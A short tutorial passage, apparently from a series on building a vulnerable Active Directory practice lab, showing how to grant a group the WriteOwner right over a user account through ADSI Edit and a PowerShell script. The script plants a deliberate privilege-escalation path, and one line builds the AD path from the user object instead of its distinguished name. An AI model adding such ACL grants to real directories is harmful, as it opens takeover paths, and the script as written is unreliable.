WriteOwner

WriteOwner basically allow us to become the owner of the object, granting us GenericAll or GenericWrite .

ADSI Edit

Same as the other ACEs, open ADSI Edit and browse to your target account, in my case a.king. Right click it, go to the security tab and click on advanced. Select the principal you want to grant this privilege over. I'll use Infrastructure Managers.

PowerShell

As mentioned previously, is more unreliable.

$MyAdmin = (get-adgroup "Infrastructure Managers").sid
$MyUser = (get-aduser a.king)
$MyDistinguishedName = ($Myuser).distinguishedname
$MyDistinguishedNameAD = $MyDistinguishedName = "AD:$MyUser"
$MyACL= Get-ACL $MyDistinguishedNameAD
$MyADRights = [System.DirectoryServices.ActiveDirectoryRights] "WriteOwner" # change to the preferred ACE
$MyType = [System.Security.AccessControl.AccessControlType] "Allow"
$MyInheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "All"
$MyACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $MyAdmin,$MyADRights,$MyType,$MyInheritanceType
$MyACL.AddAccessRule($MyACE)
Set-acl -aclobject $MyACL $MyDistinguishedNameAD
(Get-ACL "AD:$((Get-ADUser -Identity 'a.king').distinguishedname)").access | Select IdentityReference, AccessControlType, ActiveDirectoryRights | Where-Object  {$_.ActiveDirectoryRights -contains "WriteOwner"}

Written by ruycr4ft